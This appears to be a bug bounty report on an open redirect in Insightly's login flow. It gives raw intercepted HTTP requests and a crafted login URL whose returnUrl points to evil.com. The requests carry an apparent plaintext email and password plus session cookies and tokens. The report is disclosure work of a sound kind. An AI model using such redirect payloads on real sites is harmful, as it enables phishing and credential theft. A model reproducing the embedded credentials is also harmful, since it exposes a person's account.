returnUrl= allow attacker to redirect users to the another phising website and takeover credientials

Hello team, While testing the application https://crm.na1.insightly.com, i found an interesting parameter from where i was able to redirect users to the another domains and can takeover the victims account. I found this issue in the login authentication so there will be the chance that i can easily takeover victims account. Vulnerable URL: https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz%2fWKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4%2fQN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN%2f0kaMWB3Ia4GCVOvTPhfZUGkgOY%2fHMC9ZCrdjXMNP%2fjoOqZ%2foqBrFRu4tCE%2fmX%2fJW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW%2boBmu%2bMfXT&returnUrl=http%3a%2f%2f192.168.1.77%3a8000%2f This url will work once a time, every time for the new attack or redirect, we have to generate new url. #STEPS TO REPLICATE [1]. Go to the website [ crm.na1.insightly.com ] and login with your credentials [2]. Now intercept the request you will get the request ```html POST /User/AuthenticateForms HTTP/1.1 Host: login.insightly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 200 Origin: https://login.insightly.com Connection: close Referer: https://login.insightly.com/User/Login?ReturnUrl=%2f Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; AWSALB=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; AWSALBCORS=Y3Fjm3LQsxNKT84McWot52MHU2C/HwfKbq+s74yUTTH2TEx2nF+3XmMjln92tMk76u648lSWWcAxdgiExZPj1hoJjECf7KtNZJETE9f4L/MeRALwV+7n8nE7sp8i; __RequestVerificationToken=QCRlZvTgq1rk1IUSbo8mRy-mB7iuijVFW86khR6ZnGbFMug6h6VoK9i31B-I7H-u9D96HtrUMXH6RmwEmgFNbIz50Yg1; X-FrontDoor-ReturnUrl=2edc8651-06eb-403a-96c8-272da3cd9efa; X-FrontDoor-AppId=3a16582b-b1f0-4306-a2ba-397c731514a4; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 __RequestVerificationToken=4BVQV2MAdvcy2OyK6O0n3y42YRSJDDLcxesTFOeBBnwMLe1tiW_wCpMUoVZOop4wu1SxC95l_rcYoEGGWnzriUmmZJE1&email=ilovebugbounty%40gmail.com&password=AMRIT007qwerty%23&ReturnUrl=%2F&AppId= ``` [3]. Now change the parameter ReturnUrl=%2F > ReturnUrl=https://evil.com [4]. Send the request [5]. Now you will receive GET url as ```html GET /User/FrontDoorLogin/?token=YrkOz7vdHHA9AH7B%2fY5jUdIP1%2bchPdePfn0Zm7uCtVQui0tHHMW24B14WwsYP5%2bKpa3Xz7%2f5r5muQa3EB%2bQEwtPlJ8XbvozoLZFfhD75Sm3tKLhdgfWWHYq8abV2%2bpOtifD1I5N2uomDBXvMQ8tjFREb39XDuUcrObQMUsqboMZY9dojVqORmIYwb4VPyoSBaYOF4%2bYOX3GTYj8t1ArOA0xeH4oorz6flU6FLrfTLdtG6u%2fC7vZ9CfvsfH3F%2bBye&returnUrl=https://evil.com HTTP/1.1 Host: crm.na1.insightly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://login.insightly.com/ Connection: close Cookie: _sp_ses.7ea0=*; _sp_id.7ea0=f284c58a-fddc-4d25-be6f-72f320bc4ce3.1650349456.1.1650350244.1650349456.792d3660-5b12-4146-b8d5-114c86c5fded; _ga=GA1.2.502174674.1650349457; _gid=GA1.2.8955303.1650349457; _clck=orzge0|1|f0r|0; _clsk=hdl3b6|1650350248802|3|1|a.clarity.ms/collect; _gcl_au=1.1.368515797.1650349583; optimizelyEndUserId=oeu1650349584844r0.9398955011674065; snaptid=sac1prdc01ap32; __CustomRequestVerificationToken=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1; __CustomRequestVerificationToken_FormFieldToken=yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __CustomRequestVerificationToken_RequestHeader=ba8vT_9GKG9c0C5ouvyDnb6dib23sbOGJDcGfABOsc7nWF0b4EDAJ6rndoYccjq97kyMQUgXaVNze4B9qLr_L6JKVxc1:yMCVyZ-Lf9cVa5jCl7aMUt0X7F_OIv31VPzzgEenFFItTXoJKRblcOHfQcrZ5J6cGRcyi444j1U6iVu9zMsRh6wYS-2X5UvW3wbEtQTrhgBrMGs1WkyBLkc6JFdwb2yVRXEJ4A2; __RequestVerificationToken=wPFGU1uIataG6NwAZqD3eSkHbpqcI_uL95kRCj3JVRzNwWDPjKEzT6Y7gBcVjRxo18lPLGKF0qezBquaDeAuHBPbIfA1; _sp_ses.4737=*; _sp_id.4737=db22efce-2016-4e0a-b209-3fa6d6e03a33.1650349600.1.1650349859.1650349600.9e684406-e88a-47b0-aea8-43f727a538ce; __utma=257427929.502174674.1650349457.1650349601.1650349601.1; __utmb=257427929.4.10.1650349601; __utmc=257427929; __utmz=257427929.1650349601.1.1.utmcsr=accounts.insightly.com|utmccn=(referral)|utmcmd=referral|utmcct=/; _ga=GA1.4.502174674.1650349457; _gid=GA1.4.8955303.1650349457; error=; _uetsid=565beaf0bfa911ecb94aef8d37202906; _uetvid=565bd680bfa911ecad8d2b88a420a93c Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-site Sec-Fetch-User: ?1 ``` {F1698318} [6]. Now copy that url and domain. For the attack the final url will be like ``` https://crm.na1.insightly.com/User/FrontDoorLogin/?token=fAPkY7H7fgz6AugiWS1HqmgQro69VkrFfjz/WKUbuJKtOIbCH0Npi1DvVp0kXUo7JYrQ2Kep6VUOybmgBo6q9byEMy3Itsa35Ra60cK2eUFK6i78lKdX4/QN4Ln3UPEzfpMTvk8ocH6Ikix0zKolaN/0kaMWB3Ia4GCVOvTPhfZUGkgOY/HMC9ZCrdjXMNP/joOqZ/oqBrFRu4tCE/mX/JW5o3J18Hx9MOuOVCNgs1mD8zKjIz1uSW+oBmu+MfXT&returnUrl=https://evil.com ``` {F1698323} ## Impact Attacker can easily redirect urls to the another phishing site and can takeover the victims account using the login endpoint.